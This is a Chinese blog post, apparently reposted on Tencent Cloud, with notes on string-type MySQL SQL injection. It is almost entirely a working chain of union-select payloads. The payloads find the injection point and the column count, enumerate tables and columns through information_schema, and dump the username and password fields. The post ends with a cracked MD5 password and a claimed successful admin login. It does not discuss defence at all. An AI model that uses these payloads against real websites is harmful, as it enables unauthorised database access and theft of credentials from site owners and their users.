专栏首页Web安全技术Mysql-字符型数据库注入笔记
原创

Mysql-字符型数据库注入笔记

本来是有图的,但是要上传太麻烦,有图点见我博客(在最下方有链接)

' %23判断注入点

' union select '1','2','3','4获取字段数,5开始报错,确定字段数为4

' and '1'='2' union select 判断可回显字段位置 ,是2和3

接下来获取数据库名 ' and '1'='2' union select '1',database(),user(),'字段

' and '1'='2' union select '1',group_concat(TABLE_NAME),'可回显字段倒数第二位','可回显字段倒数第一位' from information_schema.TABLES where TABLE_SCHEMA=database() and '1'='1 获取数据库中表名

' and '1'='2' union select '1',group_concat(COLUMN_NAME),'可回显字段倒数第二位','可回显字段最后一位' from information_schema.COLUMNS where TABLE_NAME='数据库表名' and '1'='1 获取字段名

' and '1'='2' union select '1',group_concat(字段名,字段名),'可回显字段倒数第二位','可回显字段最后一位' from 数据库表名 where '1'='1 获取用户名及密码

把md5加密过得密码进行解密

得出密码时083112

后台登录成功

转载请联系

详细看我博客

http://www.sakuar.cn/mysql-zifu/

本文原创,这个就是我博客里面的文章

原创声明,本文系作者授权云+社区发表,未经许可,不得转载。

如有侵权,请联系 yunjia_community@tencent.com 删除。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • Google Hacking语法-信息泄露挖掘

    直接用Google hacking语法 语法如下: filetype:txt 登录 filetype:xls 登录 filetype:doc 登录 这三条...

    酷酷的繁星
  • Googlehacking语法

    site:xxx.com intext:管理|后台|登陆|用户名|密码|系统|账号

    酷酷的繁星
  • GET型常见的注入点判断方法

    大家在对目标网站进行测试的时候如果挖到了SQL注入是不是要给厂商提供复现步骤和漏洞证明截图呢,提交复现步骤的时候我们只需要证明存在这个漏洞就可以过审,所以今天就...

    酷酷的繁星
  • 搜索和推荐的公平性方面 (CS IR)

    最近的几项研究强调了搜索和推荐系统是如何在不同层面表现出偏见。抵制这种偏见,并在搜索中带来一定的公平性,不仅能创造一个考虑相关性和多样性的更加平衡的环境,而且对...

    Antonia
  • 【FractalNet】Ultra-Deep Neural Networks Without Residuals (2017) 全文翻译

    Gustav Larsson(University of Chicago,larsson@cs.uchicago.edu) Michael Maire(TTI...

    魏晓蕾
  • 脚本知识的因果推理(CS CL)

    什么时候一系列事件能定义一个日常场景,以及如何从文本中引出这些知识? 在先前的工作中归纳这样的脚本时依赖一个或另一种形式,以及一个语料库事件的实例之间的相关性措...

    用户7095611
  • 多机器人系统实验室汇总

    Our research is on distributed algorithmsfor multi-robot systems, with a focus o...

    zhangrelay
  • jquery获取元素绑定的事件

    一个简单的记录,在调试jquery的事件绑定时会用到。查看某元素是否绑定上了事件。

    the5fire
  • 编写高效 TS 代码的一些建议

    TypeScript 是一种由微软开发的自由和开源的编程语言。它是 JavaScript 的一个超集,而且本质上向这个语言添加了可选的静态类型和基于类的面向对象...

    阿宝哥
  • Microservices vs Web Services

    Microservices vs Web Services. Web application development has been on the rise ...

    用户4822892

扫码关注云+社区

领取腾讯云代金券